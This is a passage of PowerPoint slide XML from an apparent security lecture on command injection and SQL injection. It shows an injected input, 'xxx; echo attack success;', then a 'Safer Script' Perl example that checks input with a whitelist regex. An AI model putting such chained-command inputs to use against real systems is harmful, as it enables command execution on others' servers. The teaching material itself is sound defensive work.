                  <a:pt x="17525" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="object 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972586" y="6230138"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="6221145"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17525" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="object 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972586" y="6230138"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="object 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="6230111"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18286"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768846" y="18286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18286"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998725" y="6221145"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768855" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768855" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="object 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8758966" y="6230138"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17779" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="object 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8758966" y="6230138"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17779" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="object 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989963" y="2112264"/>
            <a:ext cx="0" cy="4136390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="4136390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4136134"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17526">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="object 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="5960388"/>
            <a:ext cx="0" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269749"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="object 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8775959" y="2112264"/>
            <a:ext cx="0" cy="4136390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="4136390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4136134"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="16775">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="5960388"/>
            <a:ext cx="0" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269749"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="object 84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2174239" y="6239508"/>
            <a:ext cx="5344795" cy="452755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="26269A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xxx; echo attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="26269A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="26269A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>success;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 85"/>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86" name="object 86"/>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10</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">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963415" y="1006855"/>
            <a:ext cx="2132330" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Safer</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251458" y="2061474"/>
            <a:ext cx="6986270" cy="1600200"/>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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Counter attack by validating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input</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compare to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>pattern that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accepts valid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" spc="-140" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input</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see </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>example additions to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>script:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690781" y="4024531"/>
            <a:ext cx="8727440" cy="1260475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="29660">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="73660" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="585470" indent="-472440">
              <a:lnSpc>
                <a:spcPts val="1780"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="580"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="585470" algn="l"/>
                <a:tab pos="586105" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># get name of user and display their finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="70" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="586105" indent="-473075">
              <a:lnSpc>
                <a:spcPts val="1705"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="586105" algn="l"/>
                <a:tab pos="586740" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;param("user");</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="113030" marR="1868805">
              <a:lnSpc>
                <a:spcPts val="1710"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="585470" algn="l"/>
                <a:tab pos="586105" algn="l"/>
                <a:tab pos="1058545" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>die "The specified user contains illegal characters!"  17		unless ($user =~</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/^\w+$/);</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="113030">
              <a:lnSpc>
                <a:spcPts val="1670"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="585470" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>18	print `/usr/bin/finger -sh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1550" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user`;</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>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11</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>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457200"/>
            <a:ext cx="9144000" cy="1447800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1447800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1447799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEBC11"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3877309" y="1022095"/>
            <a:ext cx="3742691" cy="536044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="-130" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> (SQLi)</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145016" y="6734047"/>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13</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686815" y="5468888"/>
            <a:ext cx="8838183" cy="1120178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>injection attacks are best prevented</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-75" dirty="0">
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>by  good coding practices because they rely on  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>services </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>that must be available for ordinary  operation.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
